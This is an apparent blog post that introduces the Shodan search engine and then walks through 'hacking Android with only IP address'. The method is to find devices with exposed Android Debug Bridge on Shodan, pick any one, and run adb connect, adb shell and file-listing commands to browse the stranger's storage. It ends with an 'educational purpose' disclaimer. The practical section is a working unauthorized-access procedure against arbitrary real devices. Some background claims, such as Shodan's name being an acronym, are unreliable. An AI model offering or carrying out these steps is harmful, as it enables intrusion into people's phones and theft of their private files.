Shodan search Engine
Today we are going to know about Hacker’s search Engine,
So let’s go,
Firstly open your browser and search shodan otherwise, Click on https://www.shodan.io/this link. Shodan is free to use. Shodan search engine scans the range of IP / Network in full World. The full Form of shodan is Sentient Hyper-Optimised Data Access Network. This search engine is mainly developed / designed for mapping and collecting information about internet connected devices world wide. Sometimes shodan is also known as search engine for IoT (internet of things).
Shodan is legal because it exposes vulnerable devices and it is a “Massive Port Scanning Tool”. It sends Queries to internet connected devices for grab the information available about them publically. It is very useful to find what services are running on that device and it also provides facility to access world wide and this devices return their banner’s to the user. Using this engine we are going to find and exploit the vlunerabilities in Android. You can also live track Website’s, etc.
Hacking using IP
In this we are going to hack Android with only using IP address. Before start you must know how this attack works, How hacker use this attack and check if your device is vulnerable from this attack!. We are going to use Android Debug Bridge (ADB). We learned about ADB and how to use it in Android. You can Access files and terminal of targeted Android Device using ADB.
Here start Practical,
Open Shodan search engine in your mobile browser
Search for Android debug bridge in Search bar
It shows the list of devices in which ADB is currently running
Select any mobile device and copy it’s given IP address
So now open termux and type following commands:
adb connect (IP address of device without brackets)
By typing this command it connect with the IP address Device it shows connected to (IP address of device).
adb shell
By typing this command you can access the terminal of the device. Now we can execute commands we want.
cd sdcard
By typing this command you can access storage of that device. cd is used to change the directory.
ls
By typing this command, It displays a list of files available in that directory.
Now you can access anything you want from storage.
exit
By typing this command you are exited from the directory.
adb disconnect (IP address of device without brackets)
By typing this command it disconnect with the IP address Device it shows disconnected (IP address of device).
This Post is just for educational purpose!
Hope this post will help you to know more about Hacking using Android!
Thank You…!!!!!!
No comments:
Post a Comment